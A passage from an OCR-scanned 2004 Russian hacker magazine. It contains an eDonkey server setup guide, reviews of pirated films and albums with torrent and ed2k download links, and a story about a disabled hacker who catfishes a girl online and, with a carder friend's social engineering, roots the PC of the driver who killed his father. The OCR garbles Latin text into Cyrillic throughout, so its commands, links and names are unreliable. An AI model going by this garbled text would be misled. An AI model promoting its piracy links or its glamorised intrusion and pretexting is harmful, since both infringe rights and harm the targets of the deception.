не начали борьбу на государственном уров- 
не (аки с олигархами), пора стать прозрач- 
ным и хорошим - открыть свой собственный 
Р2Р-сервер. 

Возьмем еЭопкеу-сеть для примера линков- 
ки своего сервера. Им пусть будет Озегѵег, 
написанный на радость варез-энтузиастам 
Джедом Маккалебом для поддержки сервер- 
ной части Е02К-сети. 

Для установки его в твоем *піх-боксе нам 
потребуется вбить следующее: 

$ ѵѵдеі йрУ/йр.аиЬі.(Іе/риЬ/е(Іопкеу/(І5еп/еМ6.38.р76.д2 
$ дгір -(1 гі$егѵеМ6.38.р76.дг 
$ сіншні 755 (1$егѵег-16.38.р76 
$ гт Л (1$егѵег 

$ Іп -5 сІ$егѵег-16.38.р76 (Ізегѵег 

$ идеі йрУ/йр.аиЬі.(Іе/риЬ/е(Іопкеу/пЬи 8 ег.д 2 
$ дгір -(1 пЬизег.дг 
$ сіншні 755 пЬизег 

$ іл/деі 7ір:/Лір.аиЬі.сІе/риЬ/е(1опкеу/(ІІаипсІі 
$ сіітосі 755 сііаипсіі 

Это не рубрика «Юниксоид», так что прочти 
дополнительный комментарий: символ «$» 
вбивать не нужно, сие есть приглашение 
строки. Тут может быть и «#», если ты риск- 
нешь инсталлить сервант под рутом . 

В свое время я ставил версию 16.38, хотя 
ты можешь закатать и нечто поновее - все 
доступно на указанном РТР или на офици- 
альной паге проекта - ІидсІипип2к.[гее.Іг. При- 
дется слегка подправить конфигурационные 
файлы пака. В бопкеу.іпі можно причесать 
следующие параметры: 




пате - уникальное имя твоего сервера. 

сіезс - описалово сервера. 

тахСІіепІз - сколько клиентов допускается 

на сервер, по дефолту - 6000. 

риЫіс - если поставлен параметр ігие, то 

твой сервак будет горланить другим сайтам 

сети, что ты онлайн. Они будут направлять к 

тебе новых клиентов. Отключено по дефолту 

- 7аІзе. 

сопзоіе - включает параметром Іше, вруб- 
ленным изначально, обработку команд сер- 
вера из консоли. 

ІодЛІе - ведение логов, которое отключено 
в первоначальной инсталляции. 
ѵегЬозе - дополнительный инфо-мусор. 
ѵѵеісоте [#] - здесь приветственный 
текст, который будет отправляться всем но- 
вым юзерам. 

Шгеасіз - количество рабочих ветвей для 
обработки клиентских запросов. Обычно, 
как и вбито по дефолту, ставят 5 ветвей на 
100 клиентов. 

ІНізІР - ІР-адрес сервера. Нужно добавлять 
в случае, если сервер обезумел и определя- 
ет свой ІР неверно. 

роіі - порт, с которым клиенты будут вести 
работу. 4661 - стандарт. 
геесІІР - здесь указывается, откуда твой 
сервер будет цеплять список остальных сай- 
тов сети. Можно забить адрес любой другой 
еОопкеу-машины. 

зеесіРогІ - порт, по которому нужно тянуть 
список соседствующих сайтов. Менять базо- 
вый 4661 не рекомендуется. 

Іуре - дефолтным значением кеу на серве- 
ре устанавливается поиск по ключевым сло- 
вам. Переменная зиЬзІгіпд даст возмож- 
ность клиентам заюзать старый поисковой 
метод. Первый вариант полезнее в хозяй- 
стве. 

Шег[#] - включает фильтрацию заверен- 
ных файлов, которые будут циркулировать в 
сети. В ограничении используются метатэги 



ІаЫеЗіге - размер хэш-таблицы, где хра- 
нится файловое инфо. 2333 по дефолту. 
Значение должно быть простым числом, т.е. 
делиться лишь само на себя и на 1 . 
тахѴегзіоп и тіпѴегзіоп - эти параметры 
при конфиге трогать вовсе не обязательно. 



Л ВИДЕОВПРЕЗ 

«ЖЕНШИНП-КОШКН» 

(СПТМЮМ0М/ 

приключения - драна 

а Премьера в КІІ: 28.10.04 



а Откуда качать: ІіНр://66.90.75.92/$иргпоѵа/Лог- 
гепЫ2266/Саіѵѵотап.РК0РЕК.$ѴС0.ТЕІЕ$УНС-таѴеп(3).іоггепі 

Вес пака: 1423 Мб 

Не успел «Человек- паук» уползти со сцены, 
как нас бомбят «Женщиной-кошкой». Здесь 
косметическая фирма вместо изобретения 
нового суперпрепарата от старения напус- 
тила на героиню мутаген, который сделал 
ее женщиной-кошкой. У нее сил столько, 
что ведущие культуристы записываются на 
консультации; чувства настолько обостря- 
ются, что сотня настоящих кошек обзавиду- 
ется! Кино, как и множество других, снято 
на основе комиксов. В комиксах самое 
главное вовсе не сюжет, но качество карти- 
нок. В фильме с картинками все ОК: Хэлли 
Бэрри очень хороша. 
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«чужой против хищника» 

(ПЫЕИѴ8. РВЕООТОЮ/ 

Фантастика 

а Премьера в НУ: 21.10.04 



а Откуда качать: ІійрУ/66.90.75.92/$иргпоѵа/Лог- 
гепЫ2617/АІіеп.Ѵ$.РгесІаіог-аѵі.ІоггепІ 

а Вес пака: 701 Мб 




Вчера был «Фрэдци против Джэйсона» (Ули- 
ца вязов/Пятница 13), сегодня «Чужой про- 
тив хищника». А завтра? «Пельмени против 
блинов», «Слоны против бегемотов» и «Гоно- 
кокки против хламидий» уже ждут выпуска. 
Группа ученых выписывается в поход в Анта- 
рктику, чтобы стать свидетелями разборок 
между обозначенными в названии героями. 

«шашлык» (ТНЕ С00К0ЦТ) 

а Премьера в НУ: 21 . 1 0.04 



а Откуда качать: ІіНр://66.90.75.92/$иргпоѵа/Лог- 
гепІ5/2530/соокоиІ-роІ“с9ткѵ.іоггепі 

а Вес пака: 203 Мб 

Крутой баскетболист поднялся настолько, 
что подписал контракт на $30М с коман- 
дой своего города. Дабы продемонстри- 
ровать собственную крутость и собрать 
воедино родню с корешами, спортсмен 
организует пикник. Туда же слетается и 
его новая компания знаменитостей и 
спортивной олигархии. Еще одна черно- 




кожая комедия довольно сомнительного 
качества. 



«НЕ БЕИ К0ПЫТ0И» 
(НОНЕ 0 И ТНЕ НаИСЕ) 

а Премьера в ВУ: 28.10.04 



а Откуда качать: МІр://66.90.75.92/$иргпоѵа/Лог- 
гепІ$/1878/Ноте%200п%20Т1іе%20Капде_аѵі.іоггепі 

а Вес пака: 690 Мб 




Бедная бабушка-старушка обязана выпла- 
тить целых $1 К долга. Ничего не остается, 
как продать ферму... Мультфильм о колхоз- 
ной живности, защищающей свой дом от 
неизбежной продажи. Для добычи необхо- 
димого бабла зверюги идут на поиск него- 
дяя, за поимку которого обещано вознаг- 
раждение - его должно хватить на помощь 
бедной старухе. Изо всех звериных приклю- 
чений получается добрый мульт, причем ре- 
ализованный в отличной графике. Хотя если 
ты не заканчиваешь свой день передачей 
«Спокойной ночи, малыши», то найти закон- 
ное оправдание потраченному на фильм 
трафику и времени будет непросто :). 



«МППЕНЬКПЯ ЧЕРН0Я 
КНИЖЕЧК0» ШТИЕ ВЮСК В00К] 

а Премьера в РУ: 1 1 .1 1 .04 



а Откуда качать: 

ѵѵш.іоггепігеасІог.пе№ггепЫѵіеѵѵ_22712 

а Вес пака: 1547 Мб 
Работая в СМИ, не использовать 
собственное служебное положение - 
страшный грех. Я, как и главная героиня 




фильма, этим совсем не грешу :). Тетя 
очень охоча до знания о прошлом своего 
сожителя, который напрочь отказывается 
рассказывать о своих прежних любовных 
победах. Как настоящая хакерша, тетя вы- 
бивает нужную инфу из Палма бойфренда. 
Приглашает обоих соучастников интриги 
на свое ток-шоу и шаг за шагом раскручи- 
вает на откровенности... Забавный фильм 
для поклонников «Секса в большом горо- 
де» покажет, что на самом деле отноше- 
ния бойфренда со своей бывшей вовсе и 
не прекращались... 



«иончжурскии кандидат» 
(ТНЕ иаиснашан саНаІЪатЕ) 

а Премьера в ВУ: 1 1 .1 1 .04 



а Откуда качать: итіоггепігеасіог.пейог- 
гепЫс!оѵѵпІоас1_25059 

а Вес пака: 2289 Мб 




Военный отряд Дензела Вашингтона был 
захвачен в плен в ходе первой иракской 
войны. После освобождения бойцы верну- 
лись домой с промытыми мозгами. Их 
тщательно зазомбировали, чтобы сделать 
рабами через много лет!.. Один из захва- 
ченных солдат круто ударяется в карьеру, 
поднимается на небывалые высоты. Ва- 
шингтон же вдруг вспоминает о проведен- 
ной терапии и спешит на помощь своему 
бывшему подопечному, чтобы того не 
вызвал тайный владыка на совершение 
зла. Оригинал фильма был о последстви- 
ях войны во Вьетнаме, когда нам самим 
(да и заморским братьям) активно промы- 
вали мозги пропагандой. После просмот- 
ра вся команда X докапывалась друг к 
дружке: когда и где тебя успели зазом- 
бить? Задерживая материалы СиТТег’у, я 
отмазываюсь: сорри, это все последствия 
жестокой терапии =\. 
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ІІЕСНѴСВЕЖПЯ ШППЕ2-КП 



откуда спить 

Для слива всех фильмов обзора тебе потребуется устано- 
вить ТоггепІ-клиент (ѵ\АЛА^ЬіМоггепІ.сот) под ѴѴіп и Агигеиз 

(зоигсе^огде.пеѴргоіесІз/агигеиз) для *піх. 

Чтобы добыть искомую музыку в ход пойдет еЭопкеу 
(хладам. есіопкеу2000. сот) для винды и МІ_сІопкеу (тісіоп- 
кеу.огд) в никсах. Указанные Логгепі: и еб2к-линки можно 
вбивать в обыкновенном браузере. 



Л 09ДИ0В0РЕЗ 

ТНЕ ЗТКЕЕТЗ 

«о еиаио поит соме гоп гвее» 
/НТВ- хип-хоп 



а Откуда качать: есІ2к://|Ше|ТІіе.$ігееі$.- 

.А.6гап(І.0опІСоте.Рог.Ргее.-.А(Іѵапсе-2004- 

Іпі1.гаг|74324879|В70СС8926ЕЗАА7Е600В57СВ5А0СВ5Р2В|/ 

л Вес пака: 71 Мб 




ТРіе 84гее4з - одна из самых многообещаю- 
щих белых рэп-команд Европы. Оригиналь- 
ность релиза прячется в успешном замесе 
британского дагаде и биЬ’а с ритмичной чит- 
кой артиста. Это первый альбом за историю 
І_еесб, получивший 100% оценку. Есть абсо- 
лютно четкие подозрения, что сие станет 
лучшей Иір-Иор работой всего 2004 года. 

КЕВ НОТ СНШ РЕРРЕК8 
«ЕІІІЕШ НѴВЕ РПНК» / РОК 



а Откуда качать: ес!2к://|ЛІе|КесІ.Но1;.СІііІі.Реррег$- 
Ыѵе.Іп.НусІе.Рагк-2ссІ-2004- 

Іозепѵіа«Іоз.Жеігаг|178250078|016С030Е7Р7ЕПСЕВЕ0657Е6 

Е14РРЕ86|/ 

а Вес пака: 170 Мб 




Очень энергичный и позитивный релиз. 
То, что ребята вытворяют в безбашенных 
клипах, - вовсе цветочки по сравнению с 
зарядом живых выступлений. Альбом не 
претендует на превосходное качество зву- 



чания, т.н. розі-ргобисбоп мог бы быть 
лучше (обработка живого сета), но по за- 
дору это определенно самый правильный 
альбом команды. 

ТЕПВ8 Е0В ГЕПВ8 «Е1ЕВТВ0ВТ 
ЮІІЕ8 0 Н0РРѴ ЕИВІКС» 



^Откуда качать: е б 2 к://| Л I е |Т еа г$_Е о г_Ееа гз_- 

_ЕѵегуЬобу_Іоѵез_А_Нарру_Епбіпд_ЕМ6_ѵѵѵѵѵѵ.ЕІі1;еМи$іс.огд. 

гаг|78716457|53429ЕС42622СЕ22142~7647510837920|/ 

а Вес пака: 75 Мб 




Это музыка времени дискотек 80-х, хотя ее 



и не столь охотно играли на танцполах дис- 
кобаров и районных ДК. Легендарный кол- 
лектив распался в 1991 и собрался снова 
лишь сейчас, чтобы выдать определенно 
зрелую работу. Не дожидаясь появления 
множества копий в ЕЭ2К, слил альбом с 
трЗ$еагсІті в день релиза. 

ВШК<МЕВІІШІ>>/ЭПЕКГРОНИКП 



а Откуда качать: есІ2к://|Ше|Віогк.- 

.МебиІІа.(192).гаг|68896057|5АЕ8272045Е4В8Е5ЕВЕ609СС65 

85В866|/ 

а Вес пака: 66 Мб 




Никто не знает точно, в чем очарование 
Віогк, но все ее хотят! С новым релизом нам 
обещали море голоса и минимум инстру- 
ментала. К дуэту вокала и ритм-машины 



подключаются участники групп Вооіз, РаіШ 
N 0 Моге и подельники Мадонны. Увы, релиз 
не заменит легендарные Роз4 и ЭеЬи4, но 
это действительно что-то новое в творчест- 
ве певицы. 

С0ВВ1ЕЕ& 0ВЕ80ЕН 
«В100М»/ПР0-ШС-ТРПНС 



а Откуда качать: еб2к://|ЛІе|6аЬгіеІ Апб Огезбеп- 

В1оот-КЕТАЛ-2004-КА1ВАВМРЗ.гаг|229052317|0А 

16041068ЕЕ85Е28СА0А884Е04СВ2В8І/ 

а Вес пака: 218 Мб 




Не стоит ругать меня за обзор творчества 
команды, которой ты не знаешь. Если те- 
бе знакомы РаиІ ѵап Эуке, ЗазМа или 
Эідѵѵееб, то и ОаЬгіеІ с Эгезбеп’ом обяза- 
тельно понравятся. Альбом содержит ре- 
миксы на главные прогрессив-хиты 2004 
и успешно дополняется треками 
собственного сочинения с отличным во- 
калом одного из участников дуэта. Что 
Э&О для мира моды, то Э&Э для мира 
прогрессив-хауса! 

ИВ. СВЕВ0 «ДЕВОЧКа-НОЧЬ» 

/этно-поп 



а Откуда качать: есІ2к://|йІе|Мг._СгесІо_- 
_0еѵос!іка-пос1і_ѵѵш.ги$$іап- 
Ьоагб.сот 192кЬрз.гаг|113170607| 
С9829993А9ВАВ9С193924493Е026674Е|/ 

а Вес пака: 107 Мб 




Ночь, центр города Челябинска, за столи- 
ком уличного кафе сидит человек с поло- 
тенцем на голове. Это творец «Хэш бола 
болы» Мистер Кредо. Он начинал в 90-ые 
и не совсем успешно перетащил старый 
продукт в новое время. Музыка ничуть не 
изменилась, и выжидать, пока в ЕЭопкеу 
появится хотя бы чуток юзеров с нужным 
паком, совсем не нужно. Для выдачи 
оценки, идентичной моей, знакомому 
обозревателю хватило утянуть лишь один 
заглавный трек с трЗзеагсб.ги. □С 
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- Привет, крошка. 

- Я скучала. 

- Я знаю :). 

- Как провел выходные? 

- Ничего особенного. В субботу ездили с друзьями 
играть в пейнтбол. Целый день пуляли друг в друга из 
пушек, после чего ели на природе шашлыки и валялись 
в сауне. В воскресенье прыгнул с моста на тарзанке, 
сходил на выставку гаджетов, а ночью тусил в 
клубешнике. 

- Вау! Я бы никогда не решилась прыгнуть с тарзанки. 

- Да, меня пугали изрядно. Ну так, адреналин 
чувствуется. Может, на следующей неделе еще прыгну. 
А у тебя как? 

- У меня все намного скучнее. Сидела дома, читала 
книжку. С подружками погуляла. 

- Домашняя ты моя :). 

- Я тебе даже немножко завидую. У тебя такая 
активная жизнь... 

- Иногда от всего этого устаешь. Хочется посидеть 
лишний раз за компьютером, поиграть в какую-нибудь 
игрушку. И в этот момент набегают друзья и тащат 
куда-то. 

- Кстати, со мной пытался познакомиться на улице 
один мальчик. 

- Расскажи! 

- Ну, все было довольно банально. Просто подошел, 
спросил, можно ли познакомиться. Но мне он как-то не 
очень понравился, поэтому долго с ним не общались. 
Он потом извинился, отошел. Вежливый весь такой =). 

- Да, как-то неудачно знакомился. 

- Ты бы наверняка подошел более оригинально =). Хотя 
тебе-то зачем, у тебя своих подружек хватает. 

- Что да то да. Правда, последнее время хочется не 
только секса, хочется нормального человеческого 
общения. С девушкой, которая тебя понимает... С такой 
девушкой, как ты. 

- Жаль, что мы живем в разных городах. Я бы так 
хотела с тобой встретиться... 

- Да, жаль. 



Запах жареной рыбы, доносящийся из кухни, стал 
нестерпимым. 

- Мам! Ну скоро там? 

- Уже почти готово! Потерпи еще пять минут. 

Легко сказать «потерпи», когда в животе урчит уже 
который час. Денис еще раз втянул ноздрями приятный 
запах и представил лакомые кусочки, аккуратно 
разложенные на тарелке. Мама умела вкусно готовить. 
Недаром работала в престижном ресторане. 

Пытаясь отвлечься от мыслей о еде, Денис зашел на 
зесигіЪуІаЬ.ги и принялся читать новости. Місгозой 
анонсировала бета-версию 1_опдбогп, Митник пиарит 
новую книгу, в Австралии 14-летнему пацану 
приписали статью «Шпионаж» за воровство паролей 
на диалап у правительственного чиновника. Про взлом 
«Лукойла» ни слова. Про очередного ламера, 
стянувшего пароль на инет, - чуть ли не 1 0 кил, а про 
то, что Денис проник в компьютерную систему одной из 
самых влиятельных компаний страны, - ноль. Понятно, 
что компания свою репутацию бережет, но 
информация должна была просочиться. Должна! 

- Кушай, родной, пока горяченькое - мама внесла в 
комнату поднос, на котором стояла тарелка с 
аппетитными кусочками жареной рыбы, тоненько 
порезанными кусками хлеба, помидорами и компот. 
Она уже давно привыкла, что Денис кушает только в 
своей комнате, и на кухне не настаивала. 

- Пасиба! - Денис взял поднос и жестом попросил 
маму ему не мешать. 

Одной рукой орудуя вилкой, другой щелкая по 
клавиатуре, он углубился в изучение текста на экране. 
Для стороннего зрителя все эти символы и циферки 
были бы не более понятными, чем инопланетные 
иероглифы. Но Денис читал исходники Ьопдбогп так 
же, как заядлый книголюб читает томик Шекспира. 
Вникая в каждую строчку, получая удовольствие от 
удачных программерских решений. Он был одним из 
первых, кому удалось заполучить полный исходный код 
ОС нового поколения. И последние три дня прошли за 



138 





МЕСТЬ РЕШ 



неотрывным чтением этого монументального творения 
гениев из МісгозоІТ. 

Денис с детства мечтал работать в этой корпорации. 
Он готовил себя для нее, изучал языки 
программирования, исследовал внутренности 
операционных систем, читал толстенные книги по 
архитектуре сетей. Такая влиятельная корпорация, как 
Місговоіі, могла изменить будущее компьютерного 
мира, и Денису было необходимо быть причастным к 
этому. Жизнь в Кремниевой Долине, работа в 
просторном офисе в коллективе таких же, как он, 
компьютерных гениев, разработка передовых 
технологий - эта картина занимала все его мысли. И 
он верил, что когда-нибудь его мечта обязательно 
исполнится. 

Верил до того самого дня 22 марта 2003 года. Самого 
ужасного в его жизни. 

★ * * 

Они всегда проводили субботу вместе. Будь то игра в 
боулинг, посещение стадиона или просто распитие пи- 
ва в одном из пабов. Денис любил отца и не понимал 
мать, которая стала инициатором их развода. Ведь 
раньше в семье было все хорошо. И вдруг, ни с того ни 
с сего все изменилось. Отец переехал на новую квар- 
тиру и виделся с Денисом теперь только по субботам. 
Он заезжал за сыном, который практически всегда си- 
дел за компьютером, и они ехали куда-нибудь, чтобы 
провести время друг с другом. 

Отец был единственным, кому Денис рассказал о сво- 
ем намерении уехать в США и работать на крупней- 
шую компьютерную корпорацию мира. Выслушав пла- 
ны сына, он без малейшего сарказма похлопал его по 
плечу и сказал: «Я верю в тебя, сынок. У тебя все полу- 
чится». 

22 марта начинался как самый обычный день. Погода 
была еще прохладная, но солнце светило ярко, 
приглашая людей выбираться из своих бетонных 
коробок на улицу. Денис сидел за компьютером и кодил 
собственный сканер. Он не собирался сделать что-то 
революционное - просто небольшая утилита с 
некоторыми полезными опциями, в основном для 
развития программерского мышления. Денису 
хотелось создать свою операционную систему - лавры 
Торвальдса не давали покоя. Но прикинув, сколько это 
отнимет времени и труда, хакер решил оставить идею. 
Вряд ли его ОС сможет конкурировать с такими 
монстрами рынка, как ПесІНаТ; І_іпих и РгееВВО. 

Отец должен был заехать в пять часов вечера. В этот 
день они собирались в один спортивный бар, 
посмотреть футбольный матч. Отец был страстным 
болельщиком и боготворил Реал Мадрид. Денис же к 
футболу был равнодушен, но был не против составить 
отцу компанию. В конце концов, с ним будет его верный 
ноутбук, и если батяня слишком увлечется игрой, 




можно будет поковырять фрю в кафе. 

Ровно в пять на дворе раздались гудки клаксона. 
Денис натянул джинсы, кроссовки, повесил на плечо 
сумку с ноутом и, попрощавшись с мамой, побежал на 
улицу. «Слишком долго не задерживайся! Я буду 
переживать», - напоследок крикнула мамуля. Отец в 
машине улыбнулся ему и похлопал по сиденью рядом: 
«Садись, ковбой!». По пути отец, как всегда, 
расспрашивал Дениса, что было нового, и тот скучным 
голосом рассказывал, как ковырялся в ядре ОС. Этот 
ритуал повторялся у них каждую субботу и забавлял 
обоих. 

- ...Вчера возился с кегпеі рапіс, которая происходит 
при сильной нагрузке сетевым бенчмарком. Причина, 
видимо, в коде виртуальной памяти. Вывел новый 
дебаггер, запущенный через последовательный порт, 
но отладить... - на последнем слове Денис внезапно 
остановился и с ужасом посмотрел в окно сбоку от 
отца. Прямо на них на большой скорости неслась 
машина, даже не думая тормозить. Отец смотрел 
вперед и лишь через секунду боковым зрением 
заметил опасность. Но было уже поздно. 

За мгновение до удара, который пришелся на кузов, в 
ушах воцарилась мертвая тишина. А потом страшный 
толчок подкинул машину и вытолкнул ее на встречку. 
Картинка в лобовом стекле завертелась, как в детском 
калейдоскопе. Денис даже не успел испугаться, хотя в 
эту секунду понял, что произошло. В мыслях 
пронеслось только одно слово: «Б***ь!». Возможно, 
для него все бы обошлось, так как синий фольцваген 
врезался в их девятку со стороны водителя. Но после 
первого удара их выбросило на проезжую часть, и не 
успевший вырулить черный форд въехал в другую 
бочину, но уже с той стороны, где сидел Денис. 
Последнее, что запомнил 19-летний парнишка, это 
громкий хлопок. Затем наступил мрак. 

* * * 

Очнулся он только через пять дней, на больничной 
койке в центральной клинике города. Рядом сидела 
мать с заплаканными глазами и держала его за руку. 
Увидев, что к сыну вернулось сознание, мама начала 
что-то говорить, но ее тихие слова Денис слышал с 
трудом. 

- Где я? - слабым голосом спросил парень. 

- В больнице. Здесь о тебе заботятся. И я всегда рядом, 
сынок. Не трать силы на разговоры. Отдыхай. 

В палату зашел доктор. 

- Ну что, боец, как самочувствие? - спросил он бодрым 
голосом. 

- Бывало и получше. 

- Ну лежи, поправляйся. Ты парень молодой, здоровый. 
У тебя все получится. 

В тот момент Денис еще не знал, что стал инвалидом 
на всю оставшуюся жизнь. Во время аварии дверь 
вмялась в салон и раздробила обе ноги. Несмотря на 
то, что операция последовала через час, спасти ноги не 
удалось, и обе пришлось ампутировать чуть выше 
колен. 

Когда Денис об этом узнал, он не впал в истерику и 
даже не испытал шока. Ему сразу представилась 
картина, о которой он так долго мечтал: Кремниевая 
Долина, престижный офис, лучшие умы, работающие с 
ним... теперь на всем этом можно было ставить 
жирный крест. Все то, ради чего он учился, ради чего 
жил, исчезло. Никто не будет брать на работу калеку. 
Теперь он никому не был нужен. Кроме преданной 
мамы, сидевшей рядом и со скорбью смотревшей на 
него. 

Чуть позже он узнал, что отец в аварии не выжил. 
Скончался на месте, еще во время первого удара. Тут 
уж Денис дал волю чувствам и, не стесняясь матери, 
зарыдал. Мама его не успокаивала, а просто крепко 
сжимала его руку, давая понять, что разделяет его горе. 





Курс лечения продлился месяц. Культи еще болели, но 
теперь он немного набрался сил и уже мог 
самостоятельно есть и нормально общаться. 
Окружающие люди поддерживали его как могли. К их 
удивлению, Денис довольно быстро смирился с тем, 
что никогда больше не сможет ходить. На самом деле 
уже через неделю у парня началась самая настоящая 
ломка. Он никогда, с того самого времени, как впервые 
открыл для себя компьютеры, не разлучался с ними 
больше чем на пару дней. И теперь, находясь в палате 
под капельницей, все еще слабый и беспомощный, он 
нуждался в компьютере. Его кормили, поили, 
вкалывали обезболивающие. Но не меньше всего 
этого ему нужно было прикоснуться пальцами к 
клавиатуре, набрать несколько консольных команд и 
войти в Сеть. 

Через три недели лечащий врач, видя страдания парня, 
принес в палату старенький ноутбук одного своего 
знакомого. В тот день мама впервые с момента аварии 
увидела, как у сына загорелись глаза. Он тут же 
подключился по ОПРЗ к Сети и проведал сайты, 
которые раньше посещал каждый день. 

На 35-й день Дениса выписали. Мама купила ему 
инвалидное кресло, в котором его отвезли домой. Дома 
все было по-прежнему, разве что комната стала более 
чистой - мама постаралась к его возвращению. Но для 
него самого началась новая жизнь. В больнице он до 
конца еще не осознавал, как ему придется жить, по- 
настоящему он почувствовал свою беспомощность 
дома. Он даже не мог самостоятельно сходить в туалет! 
И по субботам теперь никто не приезжал... У него 
оставалась единственная радость в жизни - 

компьютер. Если бы не он - жить не было смысла. 

* * * 

Виртуальные приятели, такие же гики, как он сам, были 
взволнованы его отсутствием. О своем несчастье он не 
сказал никому. Вместо этого сочинил легенду о 
месячной поездке с семьей в Лондон. 

Денис, как и раньше, проводил все свое время за 
компьютером, копаясь в исходниках и исследуя 
сетевые технологии. Несмотря на то, что главная цель 
теперь была разрушена, он не перестал 

интересоваться продукцией компании МісгозоіТ Но 

если раньше исследовал код и обдумывал, как его 
оптимизировать, какие новые идеи внести, то теперь 
искал уязвимости, чтобы использовать их против 
корпорации. Денис словно винил Місгозоіі: в том, что 
ему больше нет места среди ее сотрудников. Находя 
баги, он тут же выкладывал их на хакерских сайтах, где 
их юзали скрипткидисы, блэк-хэты, вирусмейкеры и 
прочий сброд. 

На одном из таких сайтов Денис, к тому времени уже 




довольно известный под ником Оеппу, познакомился с 
І_егг 5 ой. Девушка забыла пароль к своему е-мейлу и, не 
достучавшись до админов, попросила помощи у 
хакеров. Денису делать было особо нечего, поэтому он 
быстренько взломал базу мыльного сервака и 
вытащил оттуда нужный пароль. Девушка горячо 
поблагодарила хакера. С тех пор они стали постоянно 
общаться. 

На фотографиях, которые І_егга прислала, была 
красивая белокурая девушка с приятной улыбкой. В 
нее можно было влюбиться только за эту улыбку. 
Девушка просила его фотографию, но Денис не 
отличался выдающейся внешностью - в школе его 
называли ботаником, несмотря на то, что учился он 
хреново. Неудивительно - большие очки, непослушная 
шевелюра, рассеянный взгляд. Поэтому вместо убогой 
школьной фотографии хакер послал другую, взятую на 
одном из зарубежных модельных сайтов. На ней был 
изображен загорелый красавец-мужчина, который, 
без сомнения, мог покорить любую женщину. И 
придумал себе соответствующую легенду. 

Пару раз в неделю они встречались в ІСО и общались 
до самого утра. Денис до этого редко общался просто 
так, обычно разговоры носили практический характер. 
Хакер мог обсуждать с братьями по разуму 
операционные системы, программирование, взлом, но 
едва речь заходила о риаллайфе - предпочитал 
отмалчиваться. С І_егг’ой все было по-другому. Она 
шутила, делилась подробностями из своей жизни, 
знакомила со своим окружением. Оеппу слушал, а 
потом врал. Врал о том, что его жизнь полна событий и 
интересна, что у него много друзей и не меньше подруг, 
что он из богатой семьи, что учится в престижном вузе. 
А І_егга слушала и верила каждому его слову. 

Однажды девушка спросила Оеппу, представлял ли он 
когда-нибудь их вместе. Парнем и девушкой, мужем и 
женой. Денис предпочел отшутиться. Но на самом деле 
он представлял это с того самого момента, как она 
прислала ему свое фото. И многое бы отдал за то, 
чтобы такая девушка была всегда рядом. 

* * * 

Судебные разбирательства по поводу аварии 
продлились 8 месяцев. Денис постоянно спрашивал у 
матери, как продвигается дело. Ему хотелось, чтобы 
ублюдок, который в них въехал, отправился в тюрьму на 
30 лет. Чтобы попал в самую мерзкую тюрягу, где 
собрались одни насильники и убийцы. Но 
окончательный приговор ввел его в шок. 

Водила, который лишил его ног, а отца - жизни, 
отделался условным сроком и штрафом, покрывшим 
лишь расходы на лечение. По его словам, в машине 
отказали тормоза. Но так это или нет, проверить не 
было возможности. Всю переднюю часть автомобиля 
сплющило в гармошку. Водила отделался небольшим 
сотрясением, переломом нескольких ребер и руки. Его 
выписали из больницы через неделю. 

Человек, который убил его отца и лишил его мечты, 
гулял на свободе и продолжал наслаждаться 
прелестями полноценной жизни! Денис не мог с этим 
мириться. И раз правосудие не могло наказать этого 
урода, он сам этим займется. Постепенно у него 
сформировался план мести. 

* * * 

- Привет! =) Поздравь меня. 

- Привет, малая. С чем тебя поздравить? 

- Сегодня мне исполняется 20 лет! 

- Вау! Ты уже такая большая :). 

- Ага, совсем старая стала =). 

- Поздравляю, солнце. Будь такой же хорошей, как ты, 
и такой же клевой, как я! 

- Ха-ха, прикольное пожелание. 

- Как планируешь отмечать? 
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- Сейчас пойду маме помогать готовить. В 5 часов 
придут гости - в основном, одногруппники. А потом с 
подружками в клуб. 

- Как обычно :). 

- Угу. Как-то не получается оригинально днюху 
отмечать. А ты как отметил свой прошлый ДР? 

Денис на минуту замешкался. Он прекрасно помнил, 
как его отметил. Депрессия началась еще с утра, и он 
никак не мог заняться делом на компе. Поэтому 
проиграл до вечера во вторую халву, потом вернулась с 
работы мама и испекла праздничный пирог. Они 
посидели, попытались по-семейному пообщаться, 
потом Денису это надоело, и он вернулся к компу. Но 
так как в голову ничего не лезло, лег спать раньше 
обычного. 

- Сняли с друзьями катер и два дня, пока курсировали 
по Неве, пили, гуляли, танцевали, запускали 
фейерверки. Купались ночью при луне, стреляли по 
тарелкам. Было весело :). 

- Знаешь, а ведь я ни разу не каталась на катере. И ни 
разу не купалась при луне. 

- У тебя еще все впереди, крошка :). 

- Хорошо бы. А то мне иногда представляется толстый 
ленивый муж и жизнь с ним, проводимая только на 
кухне и в прачечной. А изредка ленивый, стандартный 
секс, больше для галочки в графе «Супружеские 
обязанности». 

- Прекращай :). У тебя будет замечательный муж. И 
жизнь твоя будет замечательной. Ты достойна этого, 
поверь. 

- Спасибо, Оеппу. Хорошо, что хоть кто-то так считает. 

* ★ * 

Первым делом Денису нужно было узнать четкий 
распорядок дня водилы. Во сколько встает, по какой 
дороге добирается на работу, где работает, когда 
возвращается обратно. Любая информация. Пока у 
Дениса на руках были только имя и фамилия урода. С 
помощью Тор РІап’а удалось узнать телефон и 
домашний адрес. Поиск по гуглю и индексу ничего не 
дал. 

В первую очередь Денису нужно было знать, есть ли у 
водилы дома комп, подключенный к Сети. Узнать 
можно было с помощью социальной инженерии, но 
такими вещами хакер никогда не занимался. Его 
специальностью был технический взлом. Но у Оеппу 
был приятель, с которым он поддерживал связь 
последние два года и которому не раз помогал за это 
время, бое! ОитЬег - 1 9-летний кардер, живущий в 
Питере, - был отличным социальным инженером и 
неоднократно пользовался своим умением забивать 
людям мозги, чтобы выманить у них деньги. Оеппу 
вполне мог рассчитывать на его помощь. И боеі 
действительно согласился помочь. 




Уже к вечеру Денис получил от кардера реальный 
айпишник компа водилы, установленную ОС, место 
работы и кое-какую дополнительную техническую 
информацию. 

- Отличная работа, 60! - не мог не восхититься Оеппу. 

- Да ерунда. Достаточно было представиться 
администратором его прова и припугнуть 
обнаруженными хакерскими атаками с его компа. 
Хакер быстро получил рута в его системе и файл за 
файлом стал изучать все, что было внутри. Из 40 гиг на 
винте оказалось 20 гиг фильмов, 5 - музыки, 5 - 
разных виндушных программ, 3 - игр, 2 гига выделено 
на всякое личное барахло, остальные были свободны. В 
первую очередь Оеппу интересовали те самые 2 гига, 
среди которых текстовые документы, презентации в 
Роѵѵег РоіпЪ’е, какие-то ролики. Все указывало на то, 
что чувак занимается пиаром в компании с 
красноречивым названием «ИдеалЪ». 

В папке с соокіез Денис наткнулся на упоминание об 
онлайновом дневнике. Пройдя по ссылке, хакер 
